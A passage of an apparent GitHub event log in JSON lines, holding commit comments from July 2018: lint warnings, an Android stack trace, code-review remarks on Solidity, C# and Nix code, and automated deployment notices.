used).\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:398:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L398) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @references http://gis.stackexchange.com/questions/24827/how-to-smooth-the-polygons-in-a-contour-map\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:407:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L407) *style:* **Variable or function name should be snake_case.**\n```r\n​    data.spline <- spline(1:(n + 2 * k), data[, 1], n = vertices, ...)\n    ^~~~~~~~~~~\n```\n[R/plotting_functions.R:411:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L411) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n"}},"created_at":"2018-07-02T01:20:08Z"}
{"id":"7904021152","type":"CommitCommentEvent","actor":{"login":"arranubels"},"repo":{"name":"arranubels/ciinabox-ecs"},"payload":{"comment":{"id":29560269,"position":29,"line":259,"path":"Rakefile","commit_id":"b6c5e5d536a957cb48343e50a8e365f268dd8031","created_at":"2018-07-02T01:21:05Z","updated_at":"2018-07-02T01:21:05Z","author_association":"OWNER","body":"Hrm not sure why this is here."}},"created_at":"2018-07-02T01:21:05Z"}
{"id":"7904022118","type":"CommitCommentEvent","actor":{"login":"mathsmathsmaths"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29560274,"position":null,"line":null,"path":null,"commit_id":"14541da929b771249ea8209698d324b61bbeee7e","created_at":"2018-07-02T01:21:34Z","updated_at":"2018-07-02T01:21:34Z","author_association":"NONE","body":"\r\n[Quake Report.zip](https://github.com/udacity/ud843-QuakeReport/files/2153425/Quake.Report.zip)\r\nHere is my version of the Quake Report App. \r\nHere is my Logcat error:\r\n   java.lang.RuntimeException: An error occurred while executing doInBackground()\r\n        at android.os.AsyncTask$3.done(AsyncTask.java:353)\r\n        at java.util.concurrent.FutureTask.finishCompletion(FutureTask.java:383)\r\n        at java.util.concurrent.FutureTask.setException(FutureTask.java:252)\r\n        at java.util.concurrent.FutureTask.run(FutureTask.java:271)\r\n        at android.os.AsyncTask$SerialExecutor$1.run(AsyncTask.java:245)\r\n        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1162)\r\n        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:636)\r\n        at java.lang.Thread.run(Thread.java:764)\r\n     Caused by: java.lang.RuntimeException: Can't create handler inside thread that has not called Looper.prepare()\r\n        at android.os.Handler.<init>(Handler.java:203)\r\n        at android.os.Handler.<init>(Handler.java:117)\r\n        at android.app.Activity.<init>(Activity.java:801)\r\n        at android.support.v4.app.SupportActivity.<init>(ComponentActivity.java:43)\r\n        at android.support.v4.app.FragmentActivity.<init>(FragmentActivity.java:68)\r\n        at android.support.v7.app.AppCompatActivity.<init>(AppCompatActivity.java:62)\r\n        at com.example.android.quakereport.Earthquake.<init>(Earthquake.java:10)\r\n        at com.example.android.quakereport.QueryUtils.extractFeatureFromJson(QueryUtils.java:86)\r\n        at com.example.android.quakereport.QueryUtils.fetchEarthquakeData(QueryUtils.java:197)\r\n        at com.example.android.quakereport.EarthquakeActivity$EarthquakeAsyncTask.doInBackground(EarthquakeActivity.java:109)\r\n        at com.example.android.quakereport.EarthquakeActivity$EarthquakeAsyncTask.doInBackground(EarthquakeActivity.java:95)\r\n        at android.os.AsyncTask$2.call(AsyncTask.java:333)\r\n        at java.util.concurrent.FutureTask.run(FutureTask.java:266)\r\n        at android.os.AsyncTask$SerialExecutor$1.run(AsyncTask.java:245) \r\n        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1162) \r\n        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:636) \r\n        at java.lang.Thread.run(Thread.java:764) "}},"created_at":"2018-07-02T01:21:34Z"}
{"id":"7904039315","type":"CommitCommentEvent","actor":{"login":"ronf"},"repo":{"name":"ronf/asyncssh"},"payload":{"comment":{"id":29560317,"position":4,"line":211,"path":"tests/server.py","commit_id":"6a92930e00f3bbc67d9cdf66816917e64f2450e9","created_at":"2018-07-02T01:31:16Z","updated_at":"2018-07-02T01:31:16Z","author_association":"OWNER","body":"I just checked ab79e0a into the \"develop\" branch. Is there any way you can give this a try to see if it fixes the problem you saw?"}},"created_at":"2018-07-02T01:31:16Z"}
{"id":"7904045816","type":"CommitCommentEvent","actor":{"login":"ser"},"repo":{"name":"spesmilo/electrum"},"payload":{"comment":{"id":29560326,"position":null,"line":null,"path":null,"commit_id":"8591587f9ed9e055edd0205ab45e9412e52c0f63","created_at":"2018-07-02T01:34:58Z","updated_at":"2018-07-02T01:34:58Z","author_association":"CONTRIBUTOR","body":"Tested and it fixes the problem. Thanks, @SomberNight "}},"created_at":"2018-07-02T01:34:58Z"}
{"id":"7904048759","type":"CommitCommentEvent","actor":{"login":"ddutta"},"repo":{"name":"CiscoAI/kubeflow-workflows"},"payload":{"comment":{"id":29560330,"position":null,"line":null,"path":null,"commit_id":"3bdaf39cdfd44c3bd6d70a487d1fe653cf3ca3b4","created_at":"2018-07-02T01:36:37Z","updated_at":"2018-07-02T01:36:37Z","author_association":"CONTRIBUTOR","body":"Could we please not hard code IP addresses?"}},"created_at":"2018-07-02T01:36:37Z"}
{"id":"7904050935","type":"CommitCommentEvent","actor":{"login":"tgisdaehyun"},"repo":{"name":"pavelmalik/BMWCanBridge"},"payload":{"comment":{"id":29560331,"position":null,"line":null,"path":null,"commit_id":"874fb6aeca684caa7831e4c860ea6164c6ab0ec9","created_at":"2018-07-02T01:37:43Z","updated_at":"2018-07-02T01:37:43Z","author_association":"NONE","body":"Hi, I have a booting NIVI1 camera(displaying Autoliv, Indigo, Flir logo). unfortunately, I don't have the matching NVE controller but only the camera.  I know the camera is waiting for LIN commands to be activated. I am wondering if you have had any chance to monitor LIN communication between NVK and NVE and what kind of communication is happening? thanks. "}},"created_at":"2018-07-02T01:37:43Z"}
{"id":"7904056715","type":"CommitCommentEvent","actor":{"login":"pabs3"},"repo":{"name":"codespell-project/codespell"},"payload":{"comment":{"id":29560348,"position":null,"line":null,"path":null,"commit_id":"654930927e8351163c327fe492ac5baa5c1c2b77","created_at":"2018-07-02T01:40:58Z","updated_at":"2018-07-02T01:40:58Z","author_association":"COLLABORATOR","body":"Yes, thanks for spotting that.\n\nFixed in commit af21de3c5ad3071d56bb1b7a4a0acd015cbcbdd2\n\n-- \nbye,\npabs\n\nhttp://bonedaddy.net/pabs3/"}},"created_at":"2018-07-02T01:40:58Z"}
{"id":"7904063710","type":"CommitCommentEvent","actor":{"login":"mo156130"},"repo":{"name":"mo156130/C2C"},"payload":{"comment":{"id":29560358,"position":null,"line":null,"path":null,"commit_id":"2aac4b4c546896b8c901e5f49545fa945d1aba48","created_at":"2018-07-02T01:44:16Z","updated_at":"2018-07-02T01:44:16Z","author_association":"OWNER","body":"哈哈"}},"created_at":"2018-07-02T01:44:16Z"}
{"id":"7904067227","type":"CommitCommentEvent","actor":{"login":"cjacobs-ibm"},"repo":{"name":"cjacobs-ibm/sample-cloud-native-toolchain-tutorial-20180701204622477"},"payload":{"comment":{"id":29560369,"position":null,"line":null,"path":null,"commit_id":"b8b19e68caf196202a4ea30a42ee48140d1423f1","created_at":"2018-07-02T01:45:46Z","updated_at":"2018-07-02T01:45:46Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ffaad832-ddb3-411c-9164-0a0222d9339e?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180701204622477\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/9007521e-b88e-4bd7-b091-063159905053?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180701204622477\") deployed [sample-cloud-native-toolchain-tutorial-20180701204622477](https://github.com/cjacobs-ibm/sample-cloud-native-toolchain-tutorial-20180701204622477/releases/tag/deploy-ibm-yp-us-south-cjacobs-us.ibm.com-test-20180702-014546 \"deploy-ibm-yp-us-south-cjacobs-us.ibm.com-test-20180702-014546\") to [test](https://console.bluemix.net/apps/7d89f04c-056c-48f5-ad74-821fc93d0b07?env_id=ibm:yp:us-south \"ibm:yp:us-south:cjacobs@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-02T01:45:46Z"}
{"id":"7904074090","type":"CommitCommentEvent","actor":{"login":"cjacobs-ibm"},"repo":{"name":"cjacobs-ibm/sample-cloud-native-toolchain-tutorial-20180701204622477"},"payload":{"comment":{"id":29560383,"position":null,"line":null,"path":null,"commit_id":"b8b19e68caf196202a4ea30a42ee48140d1423f1","created_at":"2018-07-02T01:48:59Z","updated_at":"2018-07-02T01:48:59Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ffaad832-ddb3-411c-9164-0a0222d9339e?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180701204622477\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/9007521e-b88e-4bd7-b091-063159905053?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180701204622477\") deployed [sample-cloud-native-toolchain-tutorial-20180701204622477](https://github.com/cjacobs-ibm/sample-cloud-native-toolchain-tutorial-20180701204622477/releases/tag/deploy-ibm-yp-us-south-cjacobs-us.ibm.com-prod-20180702-014858 \"deploy-ibm-yp-us-south-cjacobs-us.ibm.com-prod-20180702-014858\") to [prod](https://console.bluemix.net/apps/e0173666-dc26-4b9e-b73c-4841d0050118?env_id=ibm:yp:us-south \"ibm:yp:us-south:cjacobs@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-02T01:48:59Z"}
{"id":"7904074380","type":"CommitCommentEvent","actor":{"login":"marceloneil"},"repo":{"name":"fyookball/electrum"},"payload":{"comment":{"id":29560384,"position":null,"line":null,"path":null,"commit_id":"425be551d95b756141249e4e311e70ea032756b9","created_at":"2018-07-02T01:49:07Z","updated_at":"2018-07-02T01:49:07Z","author_association":"COLLABORATOR","body":"beauty :)"}},"created_at":"2018-07-02T01:49:07Z"}
{"id":"7904079425","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29560399,"position":null,"line":null,"path":null,"commit_id":"5d6682c9ae228678b83a9f05f3af8c59ace13286","created_at":"2018-07-02T01:51:18Z","updated_at":"2018-07-02T01:51:18Z","author_association":"CONTRIBUTOR","body":"@isonil Hey isonil!? you're on? "}},"created_at":"2018-07-02T01:51:18Z"}
{"id":"7904080217","type":"CommitCommentEvent","actor":{"login":"martinayotte"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29560401,"position":null,"line":null,"path":null,"commit_id":"8fb0d6da7b81992443aafc114acda9ab5e50dde4","created_at":"2018-07-02T01:51:42Z","updated_at":"2018-07-02T01:51:42Z","author_association":"CONTRIBUTOR","body":"USB is now working but WiFi still failed, although SDIO is now Ok !\r\nThe WiFi issue is probably that firmware loading has changed between 4.14.y and 4.17.3 : \r\n\r\n[    8.957393] brcmfmac mmc1:0001:1: Direct firmware load for brcm/brcmfmac43430-sdio.clm_blob failed with error -2\r\n\r\nCopying brcm/brcmfmac43430-sdio.bin into brcm/brcmfmac43430-sdio.clm_blob didn't fix it ...\r\n"}},"created_at":"2018-07-02T01:51:42Z"}
{"id":"7904082274","type":"CommitCommentEvent","actor":{"login":"tiann"},"repo":{"name":"android-hacker/VirtualXposed"},"payload":{"comment":{"id":29560404,"position":null,"line":null,"path":null,"commit_id":"930961b88ba11ea882b47034a1b21fddbbe6ee77","created_at":"2018-07-02T01:52:45Z","updated_at":"2018-07-02T01:52:45Z","author_association":"MEMBER","body":"I have reverted the commits:\r\n\r\nhttps://github.com/android-hacker/VirtualXposed/commit/dab14b020f54f626ea515e570f41d99ef314169e\r\nhttps://github.com/android-hacker/VirtualXposed/commit/421bdac77c96c9bd6fb25531a03ce4049e7430a1\r\nhttps://github.com/android-hacker/VirtualXposed/commit/dab14b020f54f626ea515e570f41d99ef314169e\r\n\r\nThank you!"}},"created_at":"2018-07-02T01:52:45Z"}
{"id":"7904086948","type":"CommitCommentEvent","actor":{"login":"thomas-hervey"},"repo":{"name":"openstreetmap/iD"},"payload":{"comment":{"id":29560416,"position":null,"line":null,"path":null,"commit_id":"fd1d2f006b4d6ab27b4f9a99f6dddaf89630115f","created_at":"2018-07-02T01:55:06Z","updated_at":"2018-07-02T01:55:06Z","author_association":"COLLABORATOR","body":"thanks @bhousel for the cleanup!"}},"created_at":"2018-07-02T01:55:06Z"}
{"id":"7904090755","type":"CommitCommentEvent","actor":{"login":"thomas-hervey"},"repo":{"name":"openstreetmap/iD"},"payload":{"comment":{"id":29560424,"position":null,"line":null,"path":null,"commit_id":"ede561080dccd87562d546d6cee1474cdb498da9","created_at":"2018-07-02T01:56:49Z","updated_at":"2018-07-02T01:56:49Z","author_association":"COLLABORATOR","body":"@bhousel this makes a lot of sense. These getters weren't being used yet anyways, but this helps clarify how updates work. Thanks!"}},"created_at":"2018-07-02T01:56:49Z"}
{"id":"7904091462","type":"CommitCommentEvent","actor":{"login":"yanyuhan1"},"repo":{"name":"yanyuhan1/firstLab"},"payload":{"comment":{"id":29560426,"position":null,"line":null,"path":null,"commit_id":"5e0dd59a3816abb08f4642e19fb96fdcb75b8b79","created_at":"2018-07-02T01:57:10Z","updated_at":"2018-07-02T01:57:10Z","author_association":"OWNER","body":"haha"}},"created_at":"2018-07-02T01:57:10Z"}
{"id":"7904091910","type":"CommitCommentEvent","actor":{"login":"yanyuhan1"},"repo":{"name":"yanyuhan1/firstLab"},"payload":{"comment":{"id":29560427,"position":null,"line":null,"path":null,"commit_id":"5e0dd59a3816abb08f4642e19fb96fdcb75b8b79","created_at":"2018-07-02T01:57:23Z","updated_at":"2018-07-02T01:57:23Z","author_association":"OWNER","body":"hah"}},"created_at":"2018-07-02T01:57:23Z"}
{"id":"7904091991","type":"CommitCommentEvent","actor":{"login":"FndNur1Labs"},"repo":{"name":"cryptonotefoundation/cryptonote"},"payload":{"comment":{"id":29560428,"position":null,"line":null,"path":null,"commit_id":"66b8df0c0acb8387aa1ad6afd39fbe4d09a699fc","created_at":"2018-07-02T01:57:25Z","updated_at":"2018-07-02T01:57:25Z","author_association":"NONE","body":"ok nice done"}},"created_at":"2018-07-02T01:57:25Z"}
{"id":"7904092907","type":"CommitCommentEvent","actor":{"login":"n8225"},"repo":{"name":"Kickball/awesome-selfhosted"},"payload":{"comment":{"id":29560430,"position":null,"line":null,"path":null,"commit_id":"fa3f306cb0ede6f729b344c6a3cb1ca5987552ed","created_at":"2018-07-02T01:57:52Z","updated_at":"2018-07-02T01:57:52Z","author_association":"COLLABORATOR","body":"My bad that was supposed to by pushed to my repo to create a PR."}},"created_at":"2018-07-02T01:57:52Z"}
{"id":"7904094490","type":"CommitCommentEvent","actor":{"login":"max-MB"},"repo":{"name":"max-MB/practice"},"payload":{"comment":{"id":29560432,"position":null,"line":null,"path":null,"commit_id":"1efdd3a72645fdc7073ab0f210b0b20768fda577","created_at":"2018-07-02T01:58:39Z","updated_at":"2018-07-02T01:58:39Z","author_association":"OWNER","body":"wer"}},"created_at":"2018-07-02T01:58:39Z"}
{"id":"7905678082","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29563967,"position":47,"line":33,"path":"Remittance.sol","commit_id":"1990d8801aee67ed5d68d6bd11d9e5b5da0e0152","created_at":"2018-07-02T10:00:26Z","updated_at":"2018-07-02T10:00:26Z","author_association":"NONE","body":"Is this a restriction you could remove?"}},"created_at":"2018-07-02T10:00:26Z"}
{"id":"7905680098","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29563972,"position":47,"line":33,"path":"Remittance.sol","commit_id":"1990d8801aee67ed5d68d6bd11d9e5b5da0e0152","created_at":"2018-07-02T10:00:48Z","updated_at":"2018-07-02T10:00:48Z","author_association":"NONE","body":"Carol has a business to run ;)"}},"created_at":"2018-07-02T10:00:48Z"}
{"id":"7905681754","type":"CommitCommentEvent","actor":{"login":"dangmengdangmeng"},"repo":{"name":"dangmengdangmeng/wx_app"},"payload":{"comment":{"id":29563976,"position":null,"line":null,"path":null,"commit_id":"e9add903d16f9feff2c7488462bf36d3d782e79d","created_at":"2018-07-02T10:01:07Z","updated_at":"2018-07-02T10:01:07Z","author_association":"OWNER","body":"."}},"created_at":"2018-07-02T10:01:07Z"}
{"id":"7905684135","type":"CommitCommentEvent","actor":{"login":"arihantdaga"},"repo":{"name":"esp8266/Arduino"},"payload":{"comment":{"id":29563980,"position":25,"line":150,"path":"cores/esp8266/core_esp8266_wiring_digital.c","commit_id":"641c5cdc61e5967c682a24e2df1c3b1765d60dab","created_at":"2018-07-02T10:01:34Z","updated_at":"2018-07-02T10:01:34Z","author_association":"NONE","body":"This Seems to be working..."}},"created_at":"2018-07-02T10:01:34Z"}
{"id":"7905688111","type":"CommitCommentEvent","actor":{"login":"utk-spartan"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29563985,"position":null,"line":null,"path":null,"commit_id":"0110e871ba4f9e61d890460207788aa111f1d4ab","created_at":"2018-07-02T10:02:20Z","updated_at":"2018-07-02T10:02:20Z","author_association":"OWNER","body":"@pratikkapasi\r\n@kajol22\r\n@mohakkataria"}},"created_at":"2018-07-02T10:02:20Z"}
{"id":"7905689496","type":"CommitCommentEvent","actor":{"login":"carllhw"},"repo":{"name":"carllhw/odoo-hrp-dev-docker"},"payload":{"comment":{"id":29563989,"position":null,"line":null,"path":null,"commit_id":"546ba6b461f804a02eda05561d41ce4e6e58bc3b","created_at":"2018-07-02T10:02:37Z","updated_at":"2018-07-02T10:02:37Z","author_association":"OWNER","body":"`pymqi `只针对特定场景才需要，一般场景是不需要\r\n\r\n可以直接参考该dockerfile，自己再写一个即可"}},"created_at":"2018-07-02T10:02:37Z"}
{"id":"7905689756","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29563991,"position":85,"line":47,"path":"Remittance.sol","commit_id":"1990d8801aee67ed5d68d6bd11d9e5b5da0e0152","created_at":"2018-07-02T10:02:40Z","updated_at":"2018-07-02T10:02:40Z","author_association":"NONE","body":"Passing `bytes8` does not save gas because they are padded to `bytes32` in the tx and then _chopped_ back in the bytecode. "}},"created_at":"2018-07-02T10:02:40Z"}
{"id":"7905692938","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29563993,"position":88,"line":50,"path":"Remittance.sol","commit_id":"1990d8801aee67ed5d68d6bd11d9e5b5da0e0152","created_at":"2018-07-02T10:03:18Z","updated_at":"2018-07-02T10:03:18Z","author_association":"NONE","body":"Interesting, why your choice of `sha256`?"}},"created_at":"2018-07-02T10:03:18Z"}
{"id":"7905695608","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29563996,"position":91,"line":53,"path":"Remittance.sol","commit_id":"1990d8801aee67ed5d68d6bd11d9e5b5da0e0152","created_at":"2018-07-02T10:03:50Z","updated_at":"2018-07-02T10:03:50Z","author_association":"NONE","body":"Second time you `SLOAD` the balance ;)"}},"created_at":"2018-07-02T10:03:50Z"}
{"id":"7905695673","type":"CommitCommentEvent","actor":{"login":"burlakilia"},"repo":{"name":"EddieBro/js-20180619_alexey-gerasimov"},"payload":{"comment":{"id":29563997,"position":5,"line":9,"path":"3-module/1-task/index.js","commit_id":"251616bb8cb4b07c310814c6e24e51be5e2da2b2","created_at":"2018-07-02T10:03:51Z","updated_at":"2018-07-02T10:03:51Z","author_association":"NONE","body":"Вообще это очень странное использование filter. Вы его можно сказать и не используете, можете заменить его на forEach.\r\n\r\n"}},"created_at":"2018-07-02T10:03:51Z"}
{"id":"7905699330","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29564005,"position":93,"line":55,"path":"Remittance.sol","commit_id":"1990d8801aee67ed5d68d6bd11d9e5b5da0e0152","created_at":"2018-07-02T10:04:33Z","updated_at":"2018-07-02T10:04:33Z","author_association":"NONE","body":"`delete accounts[msg.sender]` achieves the same."}},"created_at":"2018-07-02T10:04:33Z"}
{"id":"7905705848","type":"CommitCommentEvent","actor":{"login":"burlakilia"},"repo":{"name":"EddieBro/js-20180619_alexey-gerasimov"},"payload":{"comment":{"id":29564020,"position":10,"line":14,"path":"3-module/1-task/index.js","commit_id":"251616bb8cb4b07c310814c6e24e51be5e2da2b2","created_at":"2018-07-02T10:05:48Z","updated_at":"2018-07-02T10:05:48Z","author_association":"NONE","body":"У вас получается, что есть лишний перенос строки, в самом конце, а его не должно быть ."}},"created_at":"2018-07-02T10:05:48Z"}
{"id":"7905705991","type":"CommitCommentEvent","actor":{"login":"jibanCat"},"repo":{"name":"jibanCat/DigitalHumanities"},"payload":{"comment":{"id":29564021,"position":null,"line":null,"path":null,"commit_id":"1c5456b8bbf45f17822f674824c7790b52695d57","created_at":"2018-07-02T10:05:50Z","updated_at":"2018-07-02T10:05:50Z","author_association":"OWNER","body":"add `html_cutoff` argument in `Book.getch_data` and `Book.write_htmls`. Too much irrelevant contents (not directly related to the text itself) in the original Han-Ji source page. Kick them out to save the memory and make the bs4 tree structure shallower."}},"created_at":"2018-07-02T10:05:50Z"}
{"id":"7905707663","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29564026,"position":85,"line":47,"path":"Remittance.sol","commit_id":"1990d8801aee67ed5d68d6bd11d9e5b5da0e0152","created_at":"2018-07-02T10:06:10Z","updated_at":"2018-07-02T10:06:10Z","author_association":"NONE","body":"Plus, when Carol has her password, she can brute-force the other password's 43 billion possibilities. Hard, not impossibly hard."}},"created_at":"2018-07-02T10:06:10Z"}
{"id":"7905708326","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29564031,"position":null,"line":null,"path":null,"commit_id":"8052930551aae1a70efc270587e57d5e3e65df61","created_at":"2018-07-02T10:06:18Z","updated_at":"2018-07-02T10:06:18Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-220](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-220).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-220-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-02T10:06:18Z"}
{"id":"7905712978","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29564035,"position":null,"line":null,"path":null,"commit_id":"390942815c312fc754f0a2aebfdae3be8004af93","created_at":"2018-07-02T10:07:13Z","updated_at":"2018-07-02T10:07:13Z","author_association":"NONE","body":"Pretty nice way to refactor code:\r\nto pass an object and fetch data from it in `cshtml`s"}},"created_at":"2018-07-02T10:07:13Z"}
{"id":"7905716319","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29564042,"position":66,"line":66,"path":"contracts/FundsSplitter.sol","commit_id":"cba4bc351bc451ba8a3cf7cb0699ad91286eea39","created_at":"2018-07-02T10:07:53Z","updated_at":"2018-07-02T10:07:53Z","author_association":"OWNER","body":"Removed. Actually i created it from unit testing and forgot to remove it. Thks"}},"created_at":"2018-07-02T10:07:53Z"}
{"id":"7905717515","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29564046,"position":85,"line":47,"path":"Remittance.sol","commit_id":"1990d8801aee67ed5d68d6bd11d9e5b5da0e0152","created_at":"2018-07-02T10:08:09Z","updated_at":"2018-07-02T10:08:09Z","author_association":"NONE","body":"Also, do you allow reuse of the same passwords over and over?"}},"created_at":"2018-07-02T10:08:09Z"}
{"id":"7905733747","type":"CommitCommentEvent","actor":{"login":"spacefrogg"},"repo":{"name":"timor/timor-overlay"},"payload":{"comment":{"id":29564073,"position":80,"line":82,"path":"default.nix","commit_id":"f5472c9634d89f4bfc6ab8ad3a9bf2fc401a61ef","created_at":"2018-07-02T10:11:26Z","updated_at":"2018-07-02T10:11:26Z","author_association":"CONTRIBUTOR","body":"Why not putting `passthru` directly into `self.buildEnv`? Does it not take this attribute?"}},"created_at":"2018-07-02T10:11:26Z"}
{"id":"7905734594","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29564074,"position":null,"line":null,"path":null,"commit_id":"af8149ecc38a3748cea7953aacd646476f9977cd","created_at":"2018-07-02T10:11:36Z","updated_at":"2018-07-02T10:11:36Z","author_association":"NONE","body":"Nice amount of code in the commits, and it is pretty obvious what it is for. \r\nIf you want to do it in a bit better way, you can add a bit longer description. \r\nAdding a `cshtml` is not a feature, it is a generated or added code to it.\r\nThe text should be something like this: `can provide tricks through school.cshtml`."}},"created_at":"2018-07-02T10:11:36Z"}
{"id":"7905738722","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29564083,"position":null,"line":null,"path":null,"commit_id":"c0cd1749c39dcda4994179763bf8b2041a64b893","created_at":"2018-07-02T10:12:27Z","updated_at":"2018-07-02T10:12:27Z","author_association":"NONE","body":"It is nice from you, that you are using `add`instead of `added`. 👍 \r\n"}},"created_at":"2018-07-02T10:12:27Z"}
{"id":"7905738939","type":"CommitCommentEvent","actor":{"login":"utk-spartan"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29564085,"position":null,"line":null,"path":null,"commit_id":"7364aa1695da8239353885cd20939f2e0007f973","created_at":"2018-07-02T10:12:30Z","updated_at":"2018-07-02T10:12:30Z","author_association":"OWNER","body":"@pratikkapasi\r\n@kajol22\r\n@mohakkataria\r\n@shubhambadkur12\r\n@ratanphayade"}},"created_at":"2018-07-02T10:12:30Z"}
{"id":"7905739202","type":"CommitCommentEvent","actor":{"login":"Julemane"},"repo":{"name":"Julemane/tp_oc"},"payload":{"comment":{"id":29564086,"position":null,"line":null,"path":null,"commit_id":"59481688ca9cee5f7963425d7816bf9d56759691","created_at":"2018-07-02T10:12:33Z","updated_at":"2018-07-02T10:12:33Z","author_association":"OWNER","body":"une modification quelconque ! "}},"created_at":"2018-07-02T10:12:33Z"}
{"id":"7905747724","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29564100,"position":5,"line":14,"path":"week-07/day-4/FoxClub/FoxClub/Models/GiraffeModel.cs","commit_id":"c0cd1749c39dcda4994179763bf8b2041a64b893","created_at":"2018-07-02T10:14:17Z","updated_at":"2018-07-02T10:14:17Z","author_association":"NONE","body":"Please don't let inner fields `leak`. Use meaningful methods to gather the data from `Model class`es.\r\nThis mentality/strategy will give your code good structure and modality.\r\nNice solution anyway, keep up the good work. 🥇 "}},"created_at":"2018-07-02T10:14:17Z"}
{"id":"7905753613","type":"CommitCommentEvent","actor":{"login":"spacefrogg"},"repo":{"name":"timor/timor-overlay"},"payload":{"comment":{"id":29564111,"position":null,"line":null,"path":null,"commit_id":"f5472c9634d89f4bfc6ab8ad3a9bf2fc401a61ef","created_at":"2018-07-02T10:15:29Z","updated_at":"2018-07-02T10:15:29Z","author_association":"CONTRIBUTOR","body":"Make it an official PR and ask for help, there. I think, you will get a lot of good advice."}},"created_at":"2018-07-02T10:15:29Z"}
{"id":"7905754398","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29564112,"position":15,"line":16,"path":"week-07/day-4/FoxClub/FoxClub/Controllers/FoxController.cs","commit_id":"136621470c8ccd05968ddebbe45658d5d98f274c","created_at":"2018-07-02T10:15:37Z","updated_at":"2018-07-02T10:15:37Z","author_association":"NONE","body":"Missing newline between methods. I know it is not a big thing, but necessary to keep your code easy-to-read.\r\n"}},"created_at":"2018-07-02T10:15:37Z"}
{"id":"7905760428","type":"CommitCommentEvent","actor":{"login":"maryamyasaei"},"repo":{"name":"evenset/ketabdan-project"},"payload":{"comment":{"id":29564119,"position":null,"line":null,"path":null,"commit_id":"d78440005315c2c6314f3113ae20241c8295e21a","created_at":"2018-07-02T10:16:50Z","updated_at":"2018-07-02T10:16:50Z","author_association":"COLLABORATOR","body":"![36621655_10212286518618042_5135284377676152832_n](https://user-images.githubusercontent.com/28941044/42158782-d6573fe6-7e34-11e8-8bf5-aa329579fbd4.png)\r\n"}},"created_at":"2018-07-02T10:16:50Z"}
